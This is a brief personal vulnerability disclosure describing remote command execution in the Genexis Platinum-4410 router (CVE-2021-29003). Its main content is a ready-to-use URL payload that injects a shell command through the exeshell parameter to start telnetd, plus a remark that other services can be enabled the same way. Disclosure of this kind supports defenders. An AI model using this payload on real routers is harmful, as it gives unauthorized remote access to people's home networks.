RCE in Genexis Router (CVE-2021-29003)

The ” Genexis Platinum-4410 wireless router RCE vulnerability ” This one I found while just testing my home network. (CVE-2021-29003)

Device Model : Platinum-4410

Hardware version : V2.1

Software version : P4410-V2-1. 28

While checking the source code I found default password in the page and also got cve on that ( CVE -2020-6170) and i try to get some telnet connect of router so i try the payload. Before that I just scan the router.

Nmap scan before

So i try this payload on the web portal for me router ip is you might different.

http://<router ip>/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60

Nmap scan after

So we enable the Telnet on router, similarly we can enable services like ssh, ftp, etc by customizing payload

Published by Jay sharma